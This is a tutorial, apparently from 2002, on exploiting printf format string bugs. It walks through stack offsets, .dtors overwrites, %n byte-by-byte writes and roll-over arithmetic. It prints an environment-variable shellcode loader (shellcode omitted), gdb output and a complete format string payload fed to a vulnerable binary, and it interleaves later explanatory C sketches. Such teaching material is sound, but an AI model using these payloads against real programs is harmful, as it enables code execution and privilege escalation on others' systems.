Format String Exploitation

When code goes wrong - Format String Exploitation
Oct 09 2002
By: DangerDuo

I will try to keep this article as short and as easy to understand as
possible, so that the average reader can follow the concept.

What is a Format String?

A format string is the string you pass to printf and similar functions in C.
It contains conversion specifiers such as %d, %s, %u, %x, %p and %n that tell
the function how to print its arguments.

How is it vulnerable?

If a program passes user input straight to printf instead of supplying its
own format string, the user can put format specifiers in the input. printf
then treats them as real specifiers and reads values off the stack for them.

Example Vulnerable Code

main(int argc,char **argv)
{ char bleh[80];

This program has a char array of 80 bytes but will only accept 79 characters.
However, it passes that array straight to printf() without providing a format string.
So it is vulnerable to format string exploitation.
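The listing above is cut short, so here is a minimal sketch of the two patterns being contrasted. The function name and the use of snprintf into a caller-supplied buffer are assumptions made for illustration, not the article's original code.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Vulnerable pattern (kept as a comment so it is never compiled in):
 *
 *     printf(bleh);        user input is used as the format string
 *
 * Safe pattern: the format string is a constant, and the user input is
 * only ever passed as an argument to it.
 */
static size_t print_safely(char *out, size_t outsz, const char *user_input)
{
    assert(out != NULL && outsz > 0 && user_input != NULL);
    snprintf(out, outsz, "%s", user_input);  /* "%s" is the only format */
    return strlen(out);                      /* bytes actually stored */
}
```

With the safe pattern, input such as AAAA%x%x comes back out exactly as typed, because the %x is treated as plain text.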



What to know so I can exploit format string

The ingredients for exploiting a format string bug include the %u, %x and %n specifiers, gdb,
shellcode, C programming, and an understanding of the stack. If we run the program above
and give it input such as AAAA followed by %x, the output includes 41414141.

41 is really 0x41 = A in hex.
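To see why a run of A characters shows up as 41s, here is a small sketch that takes the first four bytes of a string and prints them the way %x prints a 32-bit stack word. The helper name is made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Formats the first four bytes of `text` as the hex word %x would show. */
static void word_as_hex(const char *text, char out[9])
{
    uint32_t word;

    assert(strlen(text) >= 4);
    memcpy(&word, text, sizeof word);   /* same bytes, viewed as an integer */
    snprintf(out, 9, "%x", (unsigned)word);
}
```

For the input AAAA this produces 41414141. With four different letters the digits come out in an order that depends on the machine's byte order.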

So there are a few things we have to do before we can exploit a format string bug.

#1. Find how many offsets it takes to reach our buffer.

Our buffer is not always the first thing that %x reads. Suppose the code above also had a
char blah[80]; next to bleh. Other data would then sit between printf's arguments and our
buffer, and it would take more than one %x to reach bleh; say it takes 2. Usually you do it
like AAAA%x%x, with two %x. But since we're lazy, we use the $ to help us out. %2$x goes
directly to the 2nd argument, so we don't have to type all those extra %x to reach our buffer.
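The $ shortcut can be tried out safely with ordinary arguments. This is a minimal sketch assuming a C library that supports POSIX numbered arguments (glibc does); the function name and the two sample values are made up.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * "%2$x" means "print argument number 2 as hex", no matter how many
 * conversions came before it. This is a POSIX extension to printf.
 */
static void pick_arguments(char *out, size_t outsz)
{
    assert(out != NULL && outsz >= 6);
    snprintf(out, outsz, "%2$x %1$x", 0x11u, 0x22u);
}
```

The second argument is printed first, so the result is "22 11".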

Things to know

If you don't enter any AAAA, and use %x directly, you'll be reading the stack itself.

#2. What to overwrite?

Usually I am lazy and I overwrite .dtors. .dtors is the destructor table that gets added to
any C program compiled with gcc. Even if you do not declare a destructor, it still gets
added at compile time. You can also overwrite the saved EIP, just like in a buffer overflow,
but I am too lazy to search for it, so I do a .dtors overwrite. For an in-depth article on
.dtors overwrites, try your favorite search engine.

To find .dtors, I do this:

objdump -h vulnerableprogram | grep .dtor

18 .dtors        00000008  080494e8  080494e8  000004e8  2**2

We find that .dtors begins at 0x080494e8.

But we want to overwrite .dtor_end (gcc calls it __DTOR_END__), which in a program with
no destructors of its own is 4 bytes after .dtor_list (__DTOR_LIST__).

.dtor_list = 0x080494e8
.dtor_end = 0x080494ec

So just add 4 bytes and you get the result. The address 0x080494ec contains 0x00000000.
So we have to change 0x00000000 to an address of our choice, such as the address of our
shellcode :)

#3 Overwriting the address

Before we begin, check this:

int x;
printf("AAAA%n", &x);

x becomes 4 because of the %n. %n stores the number of bytes printed so far, up to but not
including the %n itself, into the int its argument points to. Each A is a char, 1 byte each,
so 4 of them = 4 bytes. That is why x becomes 4. So we can do this:

\xec\x94\x04\x08 = 0x080494ec written backward, because x86 is little endian.

If we put that at the start of our input and hit it with %n, we write 0x00000004 to
0x080494ec. That is because each \x escape is 1 byte, so 4 escapes = 4 bytes printed, and
that is why the value is 0x00000004. I hope you have an idea of what we're doing :P As you
can see, we can fill a specific address, such as .dtors, with the address of our shellcode
by printing as many bytes as it takes to equal the shellcode's address. That is manageable
when the number is small, like the 4 bytes here. But real addresses are far bigger. Imagine
an address like 0xbfffd5f8, which is over three billion in decimal.


How the hell am I gonna print that many bytes to reach that value? The computer can't take
that many. Before the output even gets that far, it will cut you off. So I'll be introducing
two methods of overwriting .dtors.
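The counting behaviour of %n described in this section can be checked with a small sketch. It uses snprintf with constant format strings and made-up function names. Some hardened C libraries restrict %n, so treat this as an illustration under that assumption rather than something guaranteed to run everywhere.

```c
#include <assert.h>
#include <stdio.h>

/* Returns what %n stores after the four characters "AAAA". */
static int count_after_text(void)
{
    char out[32];
    int x = -1;

    snprintf(out, sizeof out, "AAAA%n", &x);
    return x;
}

/* Returns what %n stores after a zero-padded number of `digits` digits. */
static int count_after_padding(int digits)
{
    char out[512];
    int x = -1;

    assert(digits >= 1 && digits < (int)sizeof out);
    snprintf(out, sizeof out, "%.*u%n", digits, 1u, &x);
    return x;
}
```

count_after_text() gives 4, and count_after_padding(248) gives 248, which is the trick used later to steer the value that %n writes.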

#4 Byte-per-Byte and Two Write

The byte-per-byte method consists of writing to 4 addresses separately. Each address
receives 1 byte, and put together the 4 bytes form the address of our shellcode. Since we
have to write to 4 addresses, they run from 0x080494ec to 0x080494ef, each one pointing
at the next byte of the target. Here is the program that loads our shellcode into an
environment variable called EGG. I ripped it from Smashing the Stack for Fun and Profit.

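------------------------ cut here ----------------------------------
/*
 * Ripped from Smashing the Stack for Fun and Profit
 * Cause DangerDuo too lazy
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET                  0
#define DEFAULT_BUFFER_SIZE             10512
#define NOP                             0x90

/* Shellcode bytes omitted here; the original is in Phrack 49. */
char shellcode[] = "";

/* Returns the current stack pointer (i386 only, gcc inline asm). */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%lx\n", addr);

  /* Fill the whole buffer with the guessed address. */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* Overwrite the first half with NOPs. */
  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  /* Copy the shellcode into the middle of the buffer. */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  /* Export the buffer as EGG and start a shell that inherits it. */
  memcpy(buff, "EGG=", 4);
  putenv(buff);
  system("/bin/bash");
  return 0;
}
---------------------------- cut here ------------------------------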

If you want to know what this code does, then refer to Phrack 49, Smashing the Stack for
Fun and Profit. Okay, now that our shellcode is loaded into an environment variable, we
find its address:

Using address: 0xbffffb9c
bash$ gdb format
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) break *main
Breakpoint 1 at 0x8048444
(gdb) run
Starting program: /home/newbies/newbie15/format
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.

Breakpoint 1, 0x8048444 in main ()

(gdb) x/200x $ebp

0xbfffd2e8:     0x00000000      0x080483c9      0x08048444      0x00000001
0xbfffd2f8:     0xbfffd314      0x08048308      0x080484ac      0x4000acb0
0xbfffd308:     0xbfffd30c      0x40013950      0x00000001      0xbfffd41b
0xbfffd318:     0x00000000      0xbfffd439      0xbfffd454      0xbfffd489
0xbfffd328:     0xbfffd490      0xbfffd4a4      0xbfffd4c3      0xbfffd4d0
0xbfffd338:     0xbfffd4f4      0xbfffd50d      0xbfffd526      0xbfffd579
0xbfffd348:     0xbfffd581      0xbfffd58f      0xbfffd59a      0xbfffd5b5
0xbfffd358:     0xbfffd5c2      0xbffffed2      0xbffffef0      0xbfffff01
0xbfffd368:     0xbfffff09      0xbfffff17      0xbfffff27      0xbfffff34
0xbfffd378:     0xbfffff45      0xbfffff53      0xbfffff64      0xbfffff73
0xbfffd388:     0xbfffff8f      0x00000000      0x00000003      0x08048034
0xbfffd398:     0x00000004      0x00000020      0x00000005      0x00000006
0xbfffd3a8:     0x00000006      0x00001000      0x00000007      0x40000000
0xbfffd3b8:     0x00000008      0x00000000      0x00000009      0x080483a8
0xbfffd3c8:     0x0000000b      0x000007df      0x0000000c      0x000007df
0xbfffd3d8:     0x0000000d      0x0000006b      0x0000000e      0x0000006b
0xbfffd3e8:     0x00000010      0x008001bf      0x0000000f      0xbfffd416
0xbfffd3f8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffd408:     0x00000000      0x00000000      0x00000000      0x35690000
0xbfffd418:     0x2f003638      0x656d6f68      0x77656e2f      0x73656962
0xbfffd428:     0x77656e2f      0x31656962      0x6f662f35      0x74616d72
0xbfffd438:     0x44575000      0x6f682f3d      0x6e2f656d      0x69627765
0xbfffd448:     0x6e2f7365      0x69627765      0x00353165      0x4f4d4552
0xbfffd458:     0x4f484554      0x613d5453      0x2d6c7364      0x322d3336
0xbfffd468:     0x312d3130      0x342d3938      0x73642e34      0x736c2e6c
0xbfffd478:     0x33306e61      0x6361702e      0x6c6c6562      0x74656e2e
0xbfffd488:     0x3d5a4800      0x00303031      0x54534f48      0x454d414e
0xbfffd498:     0x69616d3d      0x756f736e      0x00656372      0x495a4f4d
0xbfffd4a8:     0x5f414c4c      0x454d4f48      0x73752f3d      0x696c2f72
0xbfffd4b8:     0x656e2f62      0x61637374      0x69006570      0x726f6e67
0xbfffd4c8:     0x666f6565      0x0030313d      0x4f5f534c      0x4f495450
0xbfffd4d8:     0x203d534e      0x6f632d2d      0x3d726f6c      0x6f747561
---Type <return> to continue, or q <return> to quit---
0xbfffd4e8:     0x20462d20      0x2d20622d      0x00302054      0x4e45504f
0xbfffd4f8:     0x484e4957      0x3d454d4f      0x7273752f      0x65706f2f
0xbfffd508:     0x6e69776e      0x53454c00      0x45504f53      0x6c7c3d4e
0xbfffd518:     0x70737365      0x2e657069      0x25206873      0x414d0073
0xbfffd528:     0x5441504e      0x752f3d48      0x6c2f7273      0x6c61636f
0xbfffd538:     0x6e616d2f      0x73752f3a      0x616d2f72      0x72702f6e
0xbfffd548:     0x726f6665      0x3a74616d      0x7273752f      0x6e616d2f
0xbfffd558:     0x73752f3a      0x31582f72      0x2f365231      0x3a6e616d
0xbfffd568:     0x7273752f      0x65706f2f      0x6e69776e      0x6e616d2f
0xbfffd578:     0x53454c00      0x4d2d3d53      0x45535500      0x656e3d52
0xbfffd588:     0x65696277      0x4c003531      0x4f435f53      0x53524f4c
0xbfffd598:     0x414d003d      0x59544843      0x693d4550      0x2d363835
0xbfffd5a8:     0x6c2d6370      0x78756e69      0x756e672d      0x5f434c00
0xbfffd5b8:     0x3d4c4c41      0x49534f50      0x47450058      0x90903d47
0xbfffd5c8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffd5d8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffd5e8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffd5f8:     0x90909090      0x90909090      0x90909090      0x90909090

There, we see 0x90909090. So I picked 0xbfffd5f8 at random as the address of our
shellcode. Just to make sure that 0xbfffd5f8 contains 0x90909090, I did

(gdb) x/x 0xbfffd5f8
0xbfffd5f8: 0x90909090

Okay, so we'll be using 0xbfffd5f8 since it is the address of a NOP, and execution from
there will eventually slide into our shellcode. So we dissect the bytes.

0xbf = 191
0xff = 255
0xd5 = 213
0xf8 = 248

Since it is little endian, everything goes backward: we write 0xf8 to 0x080494ec, 0xd5 to
0x080494ed, 0xff to 0x080494ee and 0xbf to 0x080494ef. We can't just type the byte as \xf8;
we have to print that many characters, with %.248u or %.248x, which both come out to 248
bytes. Also, as I said before, %n writes the number of bytes printed before the %n. So for
each write we have to subtract the bytes that have already been printed.

We print our 4 addresses first, which is 16 bytes. We want 248 bytes printed before the
first %n, but since 16 bytes have already been written, we do 248 - 16, which is 232 bytes.
After that, we have to write d5, which is 213. Here we hit a problem: 213 is smaller than
248. How do we go backward?

The answer is the "roll-over" method. Basically, you add an extra 256 to the byte you
want. That makes 0xd5 + 256 = 0x1d5. We do that because the extra 0x1 spills into the next
byte up, which the following write overwrites anyway, so we still get d5, and the new total
is bigger than what we have already printed. So we need 469 bytes printed in total. Since
we have previously written 248 bytes, we subtract them: 469 - 248 = 221 bytes. After that
we have to write 255 (0xff). The count now ends in 0xd5, which is 213, so we do
255 - 213 = 42 and print 42 bytes. After that, 191 is smaller than 255, so we roll over
again: 191 + 256 = 0x1bf. That is 447, and since the count ended in 255 previously, we need
to print 447 - 255 = 192 bytes. Again the extra 0x1 does not matter.
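The padding arithmetic, including the roll-over, comes down to one small formula. This is a sketch with a made-up function name; it assumes each %n write only needs the low 8 bits of the running count to be right.

```c
#include <assert.h>

/*
 * Given how many bytes have been printed so far and the byte value the
 * next %n should store, returns how many more bytes to print first.
 * Only the low 8 bits of the running count matter for a one-byte write,
 * so going "backward" is done by wrapping around past 256.
 */
static unsigned pad_for_byte(unsigned printed_so_far, unsigned char wanted)
{
    unsigned low = printed_so_far % 256u;

    assert(printed_so_far < 0xffffff00u);   /* keep the running total sane */
    return (wanted - low + 256u) % 256u;
}
```

Starting from the 16 bytes of addresses and asking for f8, d5, ff and bf in turn, this gives 232, 221, 42 and 192, the same paddings worked out by hand above.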

With that, we can begin to construct our code.

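printf "\xec\x94\x04\x08\xed\x94\x04\x08\xee\x94\x04\x08\xef\x94\x04\x08%%.232u%%1\$n%%.221u%%2\$n%%.42u%%3\$n%%.192u%%4\$n" > file

Yes, that is our attack code. We use two % because otherwise printf would eat the % and it
would be gone from the actual payload. So %% = %. We also need the \ before each $, because
otherwise the shell would swallow it and we couldn't use the $ sign for direct parameter
access.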
So we write that number of bytes for each address using offsets. Just to refresh your
memory, we want to:

Overwrite 0x080494ec, which is .dtor_end, with 0xbfffd5f8, which is the address of a NOP
leading into our shellcode. Since I stored our attack code in a file called file, we can do
the following:
DangerDuo@electric-daisy:~$ printf "\xec\x94\x04\x08\xed\x94\x04\x08\xee\x94\x04\x08\xef\x94\x04\x08%%.232u%%1\$n%%.221u%%2\$n%%.42u%%3\$n%%.192u%%4\$n" > file
DangerDuo@electric-daisy:~$ ./egg
Using address: 0xbffffb9c
bash$ ( (cat file ; echo) ; cat ) | fmtbug

Well, that is all there is to the format string bug. But reading is not everything; playing
and testing should help you understand the stuff I did here.

To tell you readers the truth, I am not that good at format string exploitation. I only
know the basics and still have some questions.

Question 1:

If the address is 0xbffffd20

0xbf = 191
0xff = 255
0xfd = 253
0x20 = 32

We all know that 255 - 253 is 2. So if I write two more bytes, it should give 255. But it
turns out it doesn't; instead it gives me some weird hex value... If anyone can figure out
the correct way to create 0xbffffd20, please e-mail me because I have no clue :(
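One possible explanation, offered as a guess rather than something the article confirms: the number in %.2u is a minimum number of digits, not an exact width. If the stack word that %u happens to consume is a large value, it prints up to 10 digits regardless, so the running count ends up further along than planned. A small sketch of that behaviour, with a made-up helper name:

```c
#include <assert.h>
#include <stdio.h>

/* Returns how many characters "%.<precision>u" produces for `value`. */
static int printed_length(int precision, unsigned value)
{
    assert(precision >= 0);
    return snprintf(NULL, 0, "%.*u", precision, value);
}
```

For a small value such as 7, a precision of 2 prints 2 characters, but for 3221225472 it prints all 10 digits. If that is the cause, rolling over (padding by 2 + 256 = 258 instead of 2) keeps the low byte the same while making the precision larger than any value %u can print.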

Well, that is it for the article. I hope you guys enjoyed it...

